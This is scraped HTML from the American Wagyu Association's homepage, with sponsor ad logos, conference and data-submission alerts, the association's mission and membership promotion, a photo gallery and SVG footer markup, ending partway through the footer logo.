<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Vermont-Wagyu-Logo-square.jpg" width="4500" height="3512" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(5741, 'https://vermontwagyu.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Neogen_Logo_Green_Transparent_359x259-359x259.png" width="359" height="259" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(30413, 'https://www.neogen.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Member-Ads/0493-Steak-Center-Logo-359x259.jpg" width="359" height="259" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(4734, 'https://steakcentercattle.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Logos/bar-r-logo-brand-black-white-bcgnd-rectangle_for-AWA-website-Premium-Ad.png" width="359" height="259" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(60250, 'https://www.barrwagyu.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Twin-Oaks-sized.png" width="627" height="452" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(54975, 'https://twinoaksanguswagyufarm.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/old-three.jpg" width="250" height="83" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(88035, 'https://www.oldthree.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/SNF-full-EcoGreen@7x.png" width="4536" height="4536" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(67664, 'https://www.sustainablenaturalfoods.com')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Morris-Stock-Farms-3.png" width="1080" height="1080" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(86648, 'https://www.whitebarnwagyu.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Mishima-final.png" width="491" height="286" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(54974, 'https://www.mishimareserve.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Renew-Livestock-Logo-FINAL-Color.png" width="1412" height="619" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(83089, 'https://renewlivestockcompany.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Caroland-Farms-new.png" width="800" height="1000" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(52420, 'https://carolandfarmswagyu.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/4_Vytelle_4C_a009b22e-3d2d-49ef-8dca-b26e51a2bb9b.png" width="1410" height="356" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(74484, 'https://vytelle.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/lone-mountain-cattle-edited-size.png" width="444" height="291" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(54973, 'https://www.lonemountainwagyu.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Al-Nessinger-Ranch-Logo.png" width="2106" height="1927" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(30404, 'https://abnranch.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Image.png" width="1024" height="215" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(70533, 'https://wagyugenetics.com/Home')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Nichols-Ranching.jpg" width="500" height="500" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(86641, 'https://www.circlefivecattle.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Member-Ads/0493-Steak-Center-Logo-359x259.jpg" width="359" height="259" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(73186, 'https://steakcentercattle.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/JDA.jpg" width="1056" height="816" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(86643, 'https://www.jdaonline.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/m6.jpg" width="250" height="224" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(30406, 'https://www.m6ranch.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Tangeld-H-Logo-BW.jpg" width="631" height="570" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(69550, 'https://tangledh.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/GCR-Logo.png" width="1024" height="1536" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(86718, 'https://goldencreekreserve.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/BDR_Logo_2.jpg" width="370" height="437" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(72011, 'https://www.erichsenblackdogranch.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Morris-Stock-Farms-2.png" width="1080" height="1080" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(86645, 'https://www.w8ranch.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Kentucky-Wagyu-LOGO.png" width="1080" height="1080" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(73369, 'https://kentuckywagyu.org/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Member-Ads/W365.png" width="359" height="259" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(5743, 'http://wagyu365.com/')" /></picture>
 </div>
 <div class="slide">
 <picture>
<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/Copy-of-First-Class-Imports-logo.jpg" width="503" height="241" class="aspect traditional" style="cursor:pointer" alt="advertisement" onclick="adWizard.click(70427, 'https://www.forummeat.com/first-class-imports-a5-wagyu/')" /></picture>
 </div>
 	</div>
</section>

					
				<section class="block alert">
 <div id="alert" class="general">

 <a href="https://www.wagyuconference.com/2025/registration/conference/register.php" target="_blank">
 
 <strong>Registration for the 2025 AGM &; Conference:</strong>
 
 <span>Register early and save!
Take advantage of early registration discounts available now through August 17, 2025. Regular registration is open from August 18 to September 7 — after that, late fees will apply.</span>

 </a>
 
 <a href="#" aria-label="Close alert bar" class="close" data-alert-id="84068"><svg width="18" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
	<path d="M231.6 256l130.1-130.1c4.7-4.7 4.7-12.3 0-17l-22.6-22.6c-4.7-4.7-12.3-4.7-17 0L192 216.4 61.9 86.3c-4.7-4.7-12.3-4.7-17 0l-22.6 22.6c-4.7 4.7-4.7 12.3 0 17L152.4 256 22.3 386.1c-4.7 4.7-4.7 12.3 0 17l22.6 22.6c4.7 4.7 12.3 4.7 17 0L192 295.6l130.1 130.1c4.7 4.7 12.3 4.7 17 0l22.6-22.6c4.7-4.7 4.7-12.3 0-17L231.6 256z"/>
</svg></a>

 </div>
 </section>

					
				<section class="block alert">
 <div id="alert" class="informational">

 <a href="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/FEB-2025-SLL.pdf" target="_blank">
 
 <strong>February 2025 Sire Leader List Now Available:</strong>
 
 <span>Look to see the best of the best in the Black, Red and RedBlack Sires!</span>

 </a>
 
 <a href="#" aria-label="Close alert bar" class="close" data-alert-id="78287"><svg width="18" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
	<path d="M231.6 256l130.1-130.1c4.7-4.7 4.7-12.3 0-17l-22.6-22.6c-4.7-4.7-12.3-4.7-17 0L192 216.4 61.9 86.3c-4.7-4.7-12.3-4.7-17 0l-22.6 22.6c-4.7 4.7-4.7 12.3 0 17L152.4 256 22.3 386.1c-4.7 4.7-4.7 12.3 0 17l22.6 22.6c4.7 4.7 12.3 4.7 17 0L192 295.6l130.1 130.1c4.7 4.7 12.3 4.7 17 0l22.6-22.6c4.7-4.7 4.7-12.3 0-17L231.6 256z"/>
</svg></a>

 </div>
 </section>

					
				<section class="block alert">
 <div id="alert" class="informational">

 <a href="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/WEB-Carcass-Data-Worksheet.xlsx" target="_blank">
 
 <strong>Submit Your Caracass DATA!:</strong>
 
 <span>Use this form to submit carcass data to the American Wagyu Association.</span>

 </a>
 
 <a href="#" aria-label="Close alert bar" class="close" data-alert-id="43886"><svg width="18" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
	<path d="M231.6 256l130.1-130.1c4.7-4.7 4.7-12.3 0-17l-22.6-22.6c-4.7-4.7-12.3-4.7-17 0L192 216.4 61.9 86.3c-4.7-4.7-12.3-4.7-17 0l-22.6 22.6c-4.7 4.7-4.7 12.3 0 17L152.4 256 22.3 386.1c-4.7 4.7-4.7 12.3 0 17l22.6 22.6c4.7 4.7 12.3 4.7 17 0L192 295.6l130.1 130.1c4.7 4.7 12.3 4.7 17 0l22.6-22.6c4.7-4.7 4.7-12.3 0-17L231.6 256z"/>
</svg></a>

 </div>
 </section>

					
				<section class="block text">
	<h2>Mission Statement: </h2>
<p>The Corporation’s mission is to promote, foster and encourage the development and popularity of Wagyu cattle in the United States, as well as promote and protect the improvement of Wagyu cattle; and to record and register Wagyu cattle.</p>
</section>

					
				<section class="block text-media img-left">
	<div class="text-media-image">
			<picture class="">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320xAUTO_fit_center-center_none/74631/4L5A6280_2025-01-09-174033_fzpm.webp 320w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640xAUTO_fit_center-center_none/74631/4L5A6280_2025-01-09-174033_fzpm.webp 640w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_960xAUTO_fit_center-center_none/74631/4L5A6280_2025-01-09-174033_fzpm.webp 960w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_1280xAUTO_fit_center-center_none/74631/4L5A6280_2025-01-09-174033_fzpm.webp 1280w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320xAUTO_fit_center-center_none/4L5A6280_2025-01-09-174033_fzpm.jpg 320w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640xAUTO_fit_center-center_none/4L5A6280_2025-01-09-174033_fzpm.jpg 640w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_960xAUTO_fit_center-center_none/4L5A6280_2025-01-09-174033_fzpm.jpg 960w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_1280xAUTO_fit_center-center_none/4L5A6280_2025-01-09-174033_fzpm.jpg 1280w,
		" type="image/jpeg" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_1280xAUTO_fit_center-center_none/4L5A6280_2025-01-09-174033_fzpm.jpg" width="1280" height="1437" alt="4 L5 A6280" loading="lazy" />
		
	</picture>


	</div>
	<div class="text">
					<h3>Taste Excellence</h3>
				<p>The American Wagyu Association is a not-for-profit organization which provides programs and services for its members, the value of which extends to their customers and consumes of Wagyu beef. The American Wagyu Association promotes, fosters, and encourages the development and brand awareness of the Wagyu breed through breed integrity, genetic authenticity, outreach, education, research, and other programs.</p>

<p>Highly prized for their rich flavor, Wagyu cattle produce arguably the finest beef in the world.</p>
<p>Wagyu beef naturally contains a higher percentage of omega-3 and 
omega-6 fatty acids than typical beef. Not only will consumers enjoy the
 extraordinary quality of Wagyu beef, but it's heart healthy as well.</p>
					<a href="https://wagyu.org/company/strategic-plan" class="rd-button" target="">Strategic Plan!</a>
			</div>
</section>

					
				<section class="block gallery" data-gallery="8">
	<div class="wrapper">
					<a href="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_1280xAUTO_fit_center-center_none/020-AWA-2024-BrdMtg-©M.Christopher-Holloway.jpg" data-lightbox="fluid-8">
					<picture class="aspect square">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x320_crop_center-center_none/74612/020-AWA-2024-BrdMtg-©M.Christopher-Holloway.webp 320w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x320_crop_center-center_none/020-AWA-2024-BrdMtg-©M.Christopher-Holloway.jpg 320w,
		" type="image/jpeg" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x320_crop_center-center_none/020-AWA-2024-BrdMtg-©M.Christopher-Holloway.jpg" width="320" height="320" alt="020 AWA 2024 Brd Mtg M Christopher Holloway" loading="lazy" />
		<svg width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true"><defs><path d="M13.875 9.5v1.25a.47.47 0 01-.468.468h-2.188v2.187a.47.47 0 01-.469.469H9.5a.47.47 0 01-.468-.469v-2.187H6.844a.47.47 0 01-.469-.469V9.5a.47.47 0 01.47-.468h2.187V6.843a.47.47 0 01.468-.468h1.25a.47.47 0 01.47.468v2.188h2.187a.47.47 0 01.468.468zm7.852 11.12l-1.105 1.105a.934.934 0 01-1.325 0L15.4 17.83a.937.937 0 01-.274-.664v-.636a8.086 8.086 0 01-5 1.718A8.123 8.123 0 012 10.124 8.123 8.123 0 0110.125 2a8.123 8.123 0 018.125 8.124c0 1.887-.64 3.62-1.718 5h.636c.25 0 .489.097.665.273l3.894 3.894a.945.945 0 010 1.328zm-6.289-10.496a5.308 5.308 0 00-5.313-5.312 5.308 5.308 0 00-5.312 5.312 5.308 5.308 0 005.312 5.312 5.308 5.308 0 005.313-5.312z" id="prefix__a"/></defs><g fill="none" fill-rule="evenodd"><mask id="prefix__b" fill="#fff"><use xlink:href="#prefix__a"/></mask><use fill="#000" fill-rule="nonzero" xlink:href="#prefix__a"/><g mask="url(#prefix__b)" fill="#4A90E2"><path d="M0 0h24v24H0z"/></g></g></svg>
	</picture>


			</a>
					<a href="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_1280xAUTO_fit_center-center_none/oldthree.jpg" data-lightbox="fluid-8">
					<picture class="aspect square">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x320_crop_center-center_none/74634/oldthree.webp 320w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x320_crop_center-center_none/oldthree.jpg 320w,
		" type="image/jpeg" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x320_crop_center-center_none/oldthree.jpg" width="320" height="320" alt="Oldthree" loading="lazy" />
		<svg width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true"><defs><path d="M13.875 9.5v1.25a.47.47 0 01-.468.468h-2.188v2.187a.47.47 0 01-.469.469H9.5a.47.47 0 01-.468-.469v-2.187H6.844a.47.47 0 01-.469-.469V9.5a.47.47 0 01.47-.468h2.187V6.843a.47.47 0 01.468-.468h1.25a.47.47 0 01.47.468v2.188h2.187a.47.47 0 01.468.468zm7.852 11.12l-1.105 1.105a.934.934 0 01-1.325 0L15.4 17.83a.937.937 0 01-.274-.664v-.636a8.086 8.086 0 01-5 1.718A8.123 8.123 0 012 10.124 8.123 8.123 0 0110.125 2a8.123 8.123 0 018.125 8.124c0 1.887-.64 3.62-1.718 5h.636c.25 0 .489.097.665.273l3.894 3.894a.945.945 0 010 1.328zm-6.289-10.496a5.308 5.308 0 00-5.313-5.312 5.308 5.308 0 00-5.312 5.312 5.308 5.308 0 005.312 5.312 5.308 5.308 0 005.313-5.312z" id="prefix__a"/></defs><g fill="none" fill-rule="evenodd"><mask id="prefix__b" fill="#fff"><use xlink:href="#prefix__a"/></mask><use fill="#000" fill-rule="nonzero" xlink:href="#prefix__a"/><g mask="url(#prefix__b)" fill="#4A90E2"><path d="M0 0h24v24H0z"/></g></g></svg>
	</picture>


			</a>
					<a href="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_1280xAUTO_fit_center-center_none/Meatcutting_lighter_2025-01-09-174058_uaop.jpg" data-lightbox="fluid-8">
					<picture class="aspect square">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x320_crop_center-center_none/74632/Meatcutting_lighter_2025-01-09-174058_uaop.webp 320w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x320_crop_center-center_none/Meatcutting_lighter_2025-01-09-174058_uaop.jpg 320w,
		" type="image/jpeg" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x320_crop_center-center_none/Meatcutting_lighter_2025-01-09-174058_uaop.jpg" width="320" height="320" alt="Meatcutting lighter" loading="lazy" />
		<svg width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true"><defs><path d="M13.875 9.5v1.25a.47.47 0 01-.468.468h-2.188v2.187a.47.47 0 01-.469.469H9.5a.47.47 0 01-.468-.469v-2.187H6.844a.47.47 0 01-.469-.469V9.5a.47.47 0 01.47-.468h2.187V6.843a.47.47 0 01.468-.468h1.25a.47.47 0 01.47.468v2.188h2.187a.47.47 0 01.468.468zm7.852 11.12l-1.105 1.105a.934.934 0 01-1.325 0L15.4 17.83a.937.937 0 01-.274-.664v-.636a8.086 8.086 0 01-5 1.718A8.123 8.123 0 012 10.124 8.123 8.123 0 0110.125 2a8.123 8.123 0 018.125 8.124c0 1.887-.64 3.62-1.718 5h.636c.25 0 .489.097.665.273l3.894 3.894a.945.945 0 010 1.328zm-6.289-10.496a5.308 5.308 0 00-5.313-5.312 5.308 5.308 0 00-5.312 5.312 5.308 5.308 0 005.312 5.312 5.308 5.308 0 005.313-5.312z" id="prefix__a"/></defs><g fill="none" fill-rule="evenodd"><mask id="prefix__b" fill="#fff"><use xlink:href="#prefix__a"/></mask><use fill="#000" fill-rule="nonzero" xlink:href="#prefix__a"/><g mask="url(#prefix__b)" fill="#4A90E2"><path d="M0 0h24v24H0z"/></g></g></svg>
	</picture>


			</a>
					<a href="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_1280xAUTO_fit_center-center_none/1_2025-01-09-174135_lyhb.jpg" data-lightbox="fluid-8">
					<picture class="aspect square">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x320_crop_center-center_none/74633/1_2025-01-09-174135_lyhb.webp 320w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x320_crop_center-center_none/1_2025-01-09-174135_lyhb.jpg 320w,
		" type="image/jpeg" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x320_crop_center-center_none/1_2025-01-09-174135_lyhb.jpg" width="320" height="320" alt="1" loading="lazy" />
		<svg width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true"><defs><path d="M13.875 9.5v1.25a.47.47 0 01-.468.468h-2.188v2.187a.47.47 0 01-.469.469H9.5a.47.47 0 01-.468-.469v-2.187H6.844a.47.47 0 01-.469-.469V9.5a.47.47 0 01.47-.468h2.187V6.843a.47.47 0 01.468-.468h1.25a.47.47 0 01.47.468v2.188h2.187a.47.47 0 01.468.468zm7.852 11.12l-1.105 1.105a.934.934 0 01-1.325 0L15.4 17.83a.937.937 0 01-.274-.664v-.636a8.086 8.086 0 01-5 1.718A8.123 8.123 0 012 10.124 8.123 8.123 0 0110.125 2a8.123 8.123 0 018.125 8.124c0 1.887-.64 3.62-1.718 5h.636c.25 0 .489.097.665.273l3.894 3.894a.945.945 0 010 1.328zm-6.289-10.496a5.308 5.308 0 00-5.313-5.312 5.308 5.308 0 00-5.312 5.312 5.308 5.308 0 005.312 5.312 5.308 5.308 0 005.313-5.312z" id="prefix__a"/></defs><g fill="none" fill-rule="evenodd"><mask id="prefix__b" fill="#fff"><use xlink:href="#prefix__a"/></mask><use fill="#000" fill-rule="nonzero" xlink:href="#prefix__a"/><g mask="url(#prefix__b)" fill="#4A90E2"><path d="M0 0h24v24H0z"/></g></g></svg>
	</picture>


			</a>
			</div>
</section>

					
				<section class="block text-media-square img-right">
	<div class="text-media-image">
			<picture class="aspect hundred-fifteen">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x326_crop_center-center_none/21352/Membership-Are-Available-960x720_2022-08-01-005029_gifh.webp 320w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x652_crop_center-center_none/21352/Membership-Are-Available-960x720_2022-08-01-005029_gifh.webp 640w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_960x980_crop_center-center_none/21352/Membership-Are-Available-960x720_2022-08-01-005029_gifh.webp 960w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x326_crop_center-center_none/Membership-Are-Available-960x720_2022-08-01-005029_gifh.jpg 320w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x652_crop_center-center_none/Membership-Are-Available-960x720_2022-08-01-005029_gifh.jpg 640w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_960x980_crop_center-center_none/Membership-Are-Available-960x720_2022-08-01-005029_gifh.jpg 960w,
		" type="image/jpeg" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_960x720_crop_center-center_none/Membership-Are-Available-960x720_2022-08-01-005029_gifh.jpg" width="960" height="720" alt="Membership Are Available 960x720" loading="lazy" />
		
	</picture>


	</div>
	<div class="text">
		<h5><br /></h5><h5>The American Wagyu Association is a progressive, member-driven association whose membership is vibrant and growing.</h5>
<h5>Genetic Integrity</h5>
<p>The American Wagyu Association prides itself on its genetic integrity where both Fullblood and Purebred Wagyu are verified through DNA parent verification before entering the herdbook as a registered Wagyu.</p>
<h5>Record Growth</h5>
<p>Demand and enthusiasm for Wagyu in America is at an all-time high. The opportunity to join other Wagyu breeders during this period of expansion has never been greater.</p>
					<a href="https://wagyu.org/company/join-the-awa" class="rd-button" target="">Become a Member</a>
			</div>
		</section>

					
					<section class="block call-to-action-centered">
		<div class="wrapper">
			<div class="copy">
																					<h2>Friday Newsletter</h2>
								<p class="description">The American Wagyu Association&#039;s weekly Friday newsletter that contains the latest news about the association, it&#039;s members and important industry events!</p>
			</div>
			<div class="link">
				<a class="rd-button-secondary" href="https://wagyu.org/news/newsletter">Go to Latest Newsletter</a>
							</div>
		</div>
	</section>


				
	</article>
			</main>

								</div>

							<footer class="site-footer">

								
				<div class="footer-content">
					<div class="footer-logo">
						<svg width="220" height="101" viewBox="0 0 220 101" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true"><defs><path id="a" d="M0 100.494h219.542V.147H0z"/></defs><g fill="none" fill-rule="evenodd"><path d="M27.605 92.95l-3.593 7.94h.913l.935-2.083h4.29l.924 2.084h.958l-3.593-7.94h-.834zm.406 1.036l1.79 4.009h-3.593l1.803-4.01zm12.222-.98l-2.871 4.302-2.873-4.302h-.9v7.885h.866v-6.376l2.873 4.212h.044l2.873-4.223v6.387h.89v-7.885zm3.134 0v7.885h5.755v-.812h-4.866V97.32h4.303v-.811h-4.303v-2.692h4.81v-.811z" fill="#FEFEFE"/><g transform="translate(0 .532)"><path d="M54.227 96.495c1.182 0 2.026-.608 2.026-1.622v-.022c0-.968-.742-1.554-2.015-1.554h-2.433v3.198h2.422zm-3.312-4.02h3.39c.969 0 1.746.293 2.242.788.382.383.608.935.608 1.554v.023c0 1.306-.902 2.072-2.14 2.297l2.421 3.221h-1.092l-2.286-3.063h-2.253v3.063h-.89v-7.884z" fill="#FEFEFE"/><mask id="b" fill="#fff"><use xlink:href="#a"/></mask><path fill="#FEFEFE" mask="url(#b)" d="M59.139 100.358h.89v-7.884h-.89zm2.851-3.919v-.022c0-2.23 1.666-4.078 3.986-4.078 1.43 0 2.286.507 3.075 1.25l-.608.654c-.665-.63-1.408-1.082-2.479-1.082-1.745 0-3.051 1.42-3.051 3.233v.023c0 1.823 1.318 3.255 3.051 3.255 1.082 0 1.792-.418 2.547-1.138l.585.574c-.822.833-1.723 1.386-3.154 1.386-2.274 0-3.953-1.791-3.953-4.055m13.776 1.025l-1.79-4.01-1.802 4.01h3.592zm-2.196-5.046h.834l3.592 7.94h-.957l-.923-2.083h-4.291l-.935 2.084h-.912l3.592-7.94zm5.983.056h.833l4.967 6.319v-6.319h.867v7.884h-.71l-5.09-6.465v6.465h-.867zm11.671 0h.97l2.252 6.566 2.162-6.588h.732l2.162 6.588 2.253-6.566h.935l-2.816 7.94h-.755l-2.162-6.396-2.174 6.396h-.743zm17.179 4.99l-1.79-4.01-1.803 4.01h3.593zm-2.196-5.046h.833l3.593 7.94h-.957l-.924-2.083h-4.291l-.935 2.084h-.912l3.593-7.94zm5.172 4.021v-.022c0-2.163 1.588-4.078 3.952-4.078 1.33 0 2.151.383 2.94 1.048l-.574.675c-.609-.528-1.284-.9-2.4-.9-1.745 0-2.995 1.476-2.995 3.232v.023c0 1.88 1.205 3.277 3.12 3.277.9 0 1.734-.35 2.275-.789v-1.96h-2.4v-.799h3.255v3.142a4.777 4.777 0 01-3.164 1.206c-2.478 0-4.01-1.803-4.01-4.055m11.311.8l-3.277-4.765h1.081l2.658 3.942 2.68-3.942h1.036l-3.277 4.753v3.132h-.9zm5.476-.181v-4.584h.89v4.528c0 1.7.911 2.658 2.41 2.658 1.452 0 2.376-.878 2.376-2.602v-4.584h.89v4.516c0 2.298-1.318 3.492-3.29 3.492-1.947 0-3.276-1.194-3.276-3.424m17.166.406l-1.79-4.01-1.802 4.01h3.592zm-2.196-5.046h.834l3.592 7.94h-.957l-.923-2.083h-4.291l-.935 2.084h-.912l3.592-7.94zm5.308 6.792l.55-.654c.823.744 1.612 1.116 2.705 1.116 1.058 0 1.756-.564 1.756-1.341v-.023c0-.732-.393-1.149-2.05-1.497-1.813-.394-2.646-.98-2.646-2.276v-.022c0-1.239 1.092-2.151 2.59-2.151 1.15 0 1.971.326 2.77.969l-.517.687c-.732-.597-1.465-.857-2.275-.857-1.025 0-1.679.564-1.679 1.274v.022c0 .743.406 1.16 2.141 1.532 1.757.382 2.567 1.024 2.567 2.229v.022c0 1.352-1.125 2.231-2.691 2.231-1.251 0-2.275-.417-3.221-1.262m7.098.001l.55-.654c.823.744 1.612 1.116 2.705 1.116 1.058 0 1.756-.564 1.756-1.341v-.023c0-.732-.394-1.149-2.05-1.497-1.813-.394-2.646-.98-2.646-2.276v-.022c0-1.239 1.092-2.151 2.59-2.151 1.15 0 1.971.326 2.77.969l-.517.687c-.732-.597-1.465-.857-2.276-.857-1.024 0-1.678.564-1.678 1.274v.022c0 .743.406 1.16 2.14 1.532 1.757.382 2.568 1.024 2.568 2.229v.022c0 1.352-1.126 2.231-2.691 2.231-1.251 0-2.275-.417-3.222-1.262m14.497-2.77v-.022c0-1.792-1.306-3.256-3.109-3.256-1.801 0-3.085 1.442-3.085 3.233v.023c0 1.79 1.306 3.255 3.108 3.255s3.086-1.442 3.086-3.233m-7.117 0v-.022c0-2.174 1.633-4.078 4.03-4.078 2.4 0 4.01 1.881 4.01 4.055v.023c0 2.173-1.633 4.077-4.032 4.077-2.398 0-4.008-1.881-4.008-4.055m9.575 0v-.022c0-2.23 1.667-4.078 3.987-4.078 1.43 0 2.286.507 3.074 1.25l-.608.654c-.664-.63-1.407-1.082-2.478-1.082-1.745 0-3.051 1.42-3.051 3.233v.023c0 1.823 1.317 3.255 3.051 3.255 1.082 0 1.791-.418 2.546-1.138l.586.574c-.823.833-1.724 1.386-3.154 1.386-2.274 0-3.953-1.791-3.953-4.055m8.742 3.919h.89v-7.884h-.89zm8.312-2.894l-1.79-4.01-1.802 4.01h3.592zm-2.196-5.046h.834l3.592 7.94h-.957l-.923-2.083h-4.291l-.935 2.084h-.912l3.592-7.94zm7.054.879h-2.647v-.823h6.194v.823h-2.647v7.061h-.9zm5.294 7.061h.89v-7.884h-.89zm9.969-3.919v-.022c0-1.792-1.307-3.256-3.109-3.256-1.801 0-3.085 1.442-3.085 3.233v.023c0 1.79 1.306 3.255 3.108 